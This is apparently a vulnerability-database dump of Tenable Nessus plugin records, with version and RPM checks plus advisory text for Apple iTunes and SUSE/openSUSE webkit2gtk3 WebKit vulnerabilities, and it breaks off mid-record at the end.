multiple\nvulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.9.2. It is, therefore, affected by multiple\nvulnerabilities as referenced in the HT209345 advisory.\n\n - Visiting a malicious website may lead to address bar spoofing\n (CVE-2018-4440)\n\n - Visiting a malicious website may lead to user interface spoofing\n (CVE-2018-4439)\n\n - Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2018-4437, CVE-2018-4464)\n\n - Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2018-4441, CVE-2018-4442, CVE-2018-4443)\n\n - Processing maliciously crafted web content may lead to arbitrary\n code execution. (CVE-2018-4438)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-ie/HT209345\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.9.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4464\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\nconstraints = [{'fixed_version':'12.9.2'}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:28:48", "description": "This update for webkit2gtk3 to version 2.22.6 fixes the following issues (boo#1124937 boo#1119558) :\n\nSecurity vulnerabilities fixed :\n\nCVE-2018-4437: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. (boo#1119553)\n\nCVE-2018-4438: Processing maliciously crafted web content may lead to arbitrary code execution. A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n(boo#1119554)\n\nCVE-2018-4441: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119555)\n\nCVE-2018-4442: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119556)\n\nCVE-2018-4443: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119557)\n\nCVE-2018-4464: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. (boo#1119558)\n\nCVE-2019-6212: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6215: Processing maliciously crafted web content may lead to arbitrary code execution. A type confusion issue was addressed with improved memory handling.\n\nCVE-2019-6216: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6217: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6226: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2019-6227: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-6229: Processing maliciously crafted web content may lead to universal cross-site scripting. A logic issue was addressed with improved validation.\n\nCVE-2019-6233: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\nCVE-2019-6234: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\nOther bug fixes and changes: Make kinetic scrolling slow down smoothly when reaching the ends of pages, instead of abruptly, to better match the GTK+ behaviour.\n\nFix Web inspector magnifier under Wayland.\n\nFix garbled rendering of some websites (e.g. YouTube) while scrolling under X11.\n\nFix several crashes, race conditions, and rendering issues.\n\nFor a detailed list of changes, please refer to:\nhttps://webkitgtk.org/security/WSA-2019-0001.html\n\nhttps://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\n\nhttps://webkitgtk.org/security/WSA-2018-0009.html\n\nhttps://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-02-27T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2019:0497-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464", "CVE-2019-6212", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6217", "CVE-2019-6226", "CVE-2019-6227", "CVE-2019-6229", "CVE-2019-6233", "CVE-2019-6234"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension", "p-cpe:/a:novell:suse_linux:webkit-jsc", "p-cpe:/a:novell:suse_linux:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2019-0497-1.NASL", "href": "https://www.tenable.com/plugins/nessus/122474", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0497-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122474);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\", \"CVE-2019-6212\", \"CVE-2019-6215\", \"CVE-2019-6216\", \"CVE-2019-6217\", \"CVE-2019-6226\", \"CVE-2019-6227\", \"CVE-2019-6229\", \"CVE-2019-6233\", \"CVE-2019-6234\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : webkit2gtk3 (SUSE-SU-2019:0497-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.22.6 fixes the following\nissues (boo#1124937 boo#1119558) :\n\nSecurity vulnerabilities fixed :\n\nCVE-2018-4437: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling. (boo#1119553)\n\nCVE-2018-4438: Processing maliciously crafted web content may lead to\narbitrary code execution. A logic issue existed resulting in memory\ncorruption. This was addressed with improved state management.\n(boo#1119554)\n\nCVE-2018-4441: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling. (boo#1119555)\n\nCVE-2018-4442: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling. (boo#1119556)\n\nCVE-2018-4443: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling. (boo#1119557)\n\nCVE-2018-4464: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling. (boo#1119558)\n\nCVE-2019-6212: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6215: Processing maliciously crafted web content may lead to\narbitrary code execution. A type confusion issue was addressed with\nimproved memory handling.\n\nCVE-2019-6216: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6217: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6226: Processing maliciously crafted web content may lead to\narbitrary code execution. Multiple memory corruption issues were\naddressed with improved memory handling.\n\nCVE-2019-6227: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling.\n\nCVE-2019-6229: Processing maliciously crafted web content may lead to\nuniversal cross-site scripting. A logic issue was addressed with\nimproved validation.\n\nCVE-2019-6233: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling.\n\nCVE-2019-6234: Processing maliciously crafted web content may lead to\narbitrary code execution. A memory corruption issue was addressed with\nimproved memory handling.\n\nOther bug fixes and changes: Make kinetic scrolling slow down smoothly\nwhen reaching the ends of pages, instead of abruptly, to better match\nthe GTK+ behaviour.\n\nFix Web inspector magnifier under Wayland.\n\nFix garbled rendering of some websites (e.g. YouTube) while scrolling\nunder X11.\n\nFix several crashes, race conditions, and rendering issues.\n\nFor a detailed list of changes, please refer to:\nhttps://webkitgtk.org/security/WSA-2019-0001.html\n\nhttps://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\n\nhttps://webkitgtk.org/security/WSA-2018-0009.html\n\nhttps://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2019-0001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4437/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4438/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4441/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4442/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4443/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4464/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6212/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6215/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6216/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6217/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6226/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6227/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6229/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6233/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6234/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190497-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?268ab889\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-497=1\n\nSUSE Linux Enterprise Module for Desktop Applications 15:zypper in -t\npatch SUSE-SLE-Module-Desktop-Applications-15-2019-497=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2019-497=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit-jsc-4-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit-jsc-4-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit-jsc-4-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit-jsc-4-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.22.6-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.22.6-3.18.2\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:28:15", "description": "This update for webkit2gtk3 to version 2.22.6 fixes the following issues (boo#1124937 boo#1119558) :\n\nSecurity vulnerabilities fixed :\n\n - CVE-2018-4437: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. (boo#1119553)\n\n - CVE-2018-4438: Processing maliciously crafted web content may lead to arbitrary code execution. A logic issue existed resulting in memory corruption. This was addressed with improved state management. (boo#1119554)\n\n - CVE-2018-4441: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119555)\n\n - CVE-2018-4442: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119556)\n\n - CVE-2018-4443: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling. (boo#1119557)\n\n - CVE-2018-4464: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. (boo#1119558)\n\n - CVE-2019-6212: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\n - CVE-2019-6215: Processing maliciously crafted web content may lead to arbitrary code execution. A type confusion issue was addressed with improved memory handling.\n\n - CVE-2019-6216: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\n - CVE-2019-6217: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\n - CVE-2019-6226: Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.\n\n - CVE-2019-6227: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\n - CVE-2019-6229: Processing maliciously crafted web content may lead to universal cross site scripting. A logic issue was addressed with improved validation.\n\n - CVE-2019-6233: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\n - CVE-2019-6234: Processing maliciously crafted web content may lead to arbitrary code execution. A memory corruption issue was addressed with improved memory handling.\n\nOther bug fixes and changes :\n\n - Make kinetic scrolling slow down smoothly when reaching the ends of pages, instead of abruptly, to better match the GTK+ behaviour.\n\n - Fix Web inspector magnifier under Wayland.\n\n - Fix garbled rendering of some websites (e.g. YouTube) while scrolling under X11.\n\n - Fix several crashes, race conditions, and rendering issues.\n\nFor a detailed list of changes, please refer to :\n\n- https://webkitgtk.org/security/WSA-2019-0001.html\n\n- https://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\n\n- https://webkitgtk.org/security/WSA-2018-0009.html\n\n- https://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-11T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2019-308)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464", "CVE-2019-6212", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6217", "CVE-2019-6226", "CVE-2019-6227", "CVE-2019-6229", "CVE-2019-6233", "CVE-2019-6234"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-308.NASL", "href": "https://www.tenable.com/plugins/nessus/122744", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-308.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122744);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\", \"CVE-2019-6212\", \"CVE-2019-6215\", \"CVE-2019-6216\", \"CVE-2019-6217\", 